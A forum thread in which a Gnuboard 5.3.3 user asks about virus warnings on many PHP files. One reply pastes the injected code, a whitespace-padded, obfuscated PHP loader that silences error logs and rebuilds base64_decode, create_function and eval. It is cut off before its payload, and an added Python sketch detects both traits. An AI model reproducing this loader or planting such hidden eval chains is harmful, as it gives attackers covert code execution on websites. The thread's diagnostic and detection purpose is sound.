File virus infection

I am using Gnuboard version 5.3.3 on the server of an overseas hosting company.

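I was testing it before putting it to real use when I received an email saying that files were infected with a virus (Php.Downloader.BotGen-1), and when I checked, there really was strange code included. According to the hosting company, the CMS I use has weak security; does the latest version not have this problem?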

\adm\index.php: Php.Downloader.BotGen-1 FOUND
\adm\sms_admin\config.php: Php.Downloader.BotGen-1 FOUND
\config.php: Php.Downloader.BotGen-1 FOUND
\index.php: Php.Downloader.BotGen-1 FOUND
\install\index.php: Php.Downloader.BotGen-1 FOUND
\mobile\index.php: Php.Downloader.BotGen-1 FOUND
\plugin\editor\cheditor5\imageUpload\config.php: Php.Downloader.BotGen-1 FOUND
\plugin\editor\smarteditor2\photo_uploader\popup\php\index.php: Php.Downloader.BotGen-1 FOUND
\plugin\sms5\index.php: Php.Downloader.BotGen-1 FOUND
\plugin\sns\facebook\tests\bootstrap.php: Php.Downloader.BotGen-1 FOUND
\plugin\sns\twitter\index.php: Php.Downloader.BotGen-1 FOUND
\plugin\social\config.php: Php.Downloader.BotGen-1 FOUND
\plugin\social\includes\functions.php: Php.Downloader.BotGen-1 FOUND
\plugin\social\index.php: Php.Downloader.BotGen-1 FOUND
\theme\basic\index.php: Php.Downloader.BotGen-1 FOUND
\theme\basic\mobile\index.php: Php.Downloader.BotGen-1 FOUND


3 answers

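It looks like a false positive, doesn't it?

Try sending them an email asking which code is vulnerable.

Also, when using overseas hosting, false virus detections sometimes occur because of character-set differences.

If you use Gnuboard 5.4, there should be no problem.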

Try running a check on that server with PHP Malware Scanner.

https://www.phpclasses.org/package/11074-PHP-Scan-PHP-files-to-find-malicious-code.html

I actually opened the files and could see that code like the following had been added.

<?php                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                     _reporting(0); @ini_set('display_errors', 0);  @ini_set('error_log',NULL); @ini_set('log_errors',0); @ini_set('error_reporting', 0); @ini_set('display_startup_errors', 0);function  ToSJa1QEZFVIthfxHCBC6($Is8og439q,$z9po05TQA,$MUMuhjXJL){return str_replace($Is8og439q,$z9po05TQA,$MUMuhjXJL);} function  sdzwe5DAUwgcX6O3($Is8og439q,$z9po05TQA,$MUMuhjXJL){return str_replace($Is8og439q,$z9po05TQA,$MUMuhjXJL);} function  s2QrBZMfzhvwXWigD8YqSY($Is8og439q,$z9po05TQA,$MUMuhjXJL){return str_replace($Is8og439q,$z9po05TQA,$MUMuhjXJL);} $O9KBEcpT1Z4ll8O5EGqJ0Faj = 'bN2fAkLxkmYOoexg3ssfq6aaN2fAkLxkmYOoexg3ssfq6asN2fAkLxkmYOoexg3ssfq6aeN2fAkLxkmYOoexg3ssfq6a6N2fAkLxkmYOoexg3ssfq6a4N2fAkLxkmYOoexg3ssfq6a_N2fAkLxkmYOoexg3ssfq6adN2fAkLxkmYOoexg3ssfq6aeN2fAkLxkmYOoexg3ssfq6acN2fAkLxkmYOoexg3ssfq6aoN2fAkLxkmYOoexg3ssfq6adN2fAkLxkmYOoexg3ssfq6ae'; $O9KBEcpT1Z4ll8O5EGqJ0Faj = s2QrBZMfzhvwXWigD8YqSY('N2fAkLxkmYOoexg3ssfq6a','',$O9KBEcpT1Z4ll8O5EGqJ0Faj); $hVGidB9zilH = 'cXrutWuCIjuNKFprXrutWuCIjuNKFpeXrutWuCIjuNKFpaXrutWuCIjuNKFptXrutWuCIjuNKFpeXrutWuCIjuNKFp_XrutWuCIjuNKFpfXrutWuCIjuNKFpuXrutWuCIjuNKFpnXrutWuCIjuNKFpcXrutWuCIjuNKFptXrutWuCIjuNKFpiXrutWuCIjuNKFpoXrutWuCIjuNKFpn'; $hVGidB9zilH = s2QrBZMfzhvwXWigD8YqSY('XrutWuCIjuNKFp','',$hVGidB9zilH); 
$bkXytTxV7EX1jxCyKIC4u8 = 'rBVtQ0RXT9fYpcZaFgerBVtQ0RXT9fYpcZaFgvrBVtQ0RXT9fYpcZaFgarBVtQ0RXT9fYpcZaFgl'; $bkXytTxV7EX1jxCyKIC4u8 = s2QrBZMfzhvwXWigD8YqSY('rBVtQ0RXT9fYpcZaFg','',$bkXytTxV7EX1jxCyKIC4u8); $mAbXInuReFECY = '$dNOHi68Bnhc4OJKpng'; $BJltwdCTG1ufuoAsrYTsLs = $hVGidB9zilH($mAbXInuReFECY,$bkXytTxV7EX1jxCyKIC4u8.'('.$O9KBEcpT1Z4ll8O5EGqJ0Faj.'('.$mAbXInuReFECY.'));'); $BJltwdCTG1ufuoAsrYTsLs('
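
Added example, not part of the original thread: the code posted above spells `base64_decode`, `create_function` and `eval` by putting a filler token between the characters and deleting it with a `str_replace` wrapper, after a long run of spaces following `<?php`. The Python sketch below checks a file's contents for both traits. The `SENSITIVE` list, the 100-blank threshold and the sample strings are assumptions constructed for illustration.

```python
import re

# Names that droppers of this kind rebuild at run time (assumed list, extend as needed).
SENSITIVE = {"eval", "assert", "base64_decode", "create_function",
             "gzinflate", "gzuncompress", "str_rot13"}

# $var = 'literal';
ASSIGN = re.compile(r"\$(\w+)\s*=\s*'([^']*)'\s*;")
# anyfunc('FILLER', '', $var): a three-argument call that deletes FILLER from $var
STRIP = re.compile(r"\w+\(\s*'([^']+)'\s*,\s*''\s*,\s*\$(\w+)\s*\)")
# "<?php" followed by a long run of blanks that pushes the code off-screen
PADDED_OPEN = re.compile(r"<\?php[ \t]{100,}\S")


def hidden_names(php_source):
    """Map variable name -> sensitive function name it holds once the filler is removed."""
    literals = dict(ASSIGN.findall(php_source))
    found = {}
    for filler, var in STRIP.findall(php_source):
        literal = literals.get(var, "")
        rebuilt = literal.replace(filler, "")
        if filler in literal and rebuilt in SENSITIVE:
            found[var] = rebuilt
    return found


def scan(php_source):
    """Return both indicators for one file's contents."""
    return {"hidden": hidden_names(php_source),
            "padded_open": bool(PADDED_OPEN.search(php_source))}


# Constructed sample that mimics the structure of the posted code (no payload).
INFECTED = (
    "<?php" + " " * 300 +
    "function w($a,$b,$c){return str_replace($a,$b,$c);} "
    "$n1 = '" + "QQZ".join("base64_decode") + "'; $n1 = w('QQZ','',$n1); "
    "$n2 = '" + "XK".join("eval") + "'; $n2 = w('XK','',$n2); "
)
# Constructed clean file: a normal str_replace call must not be flagged.
CLEAN = "<?php\n$title = 'hello';\necho str_replace('a', '', $title);\n"

if __name__ == "__main__":
    print(scan(INFECTED))
    print(scan(CLEAN))
```

A hit on either indicator is a reason to compare the file against a clean copy of the same Gnuboard release, not proof of infection on its own.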
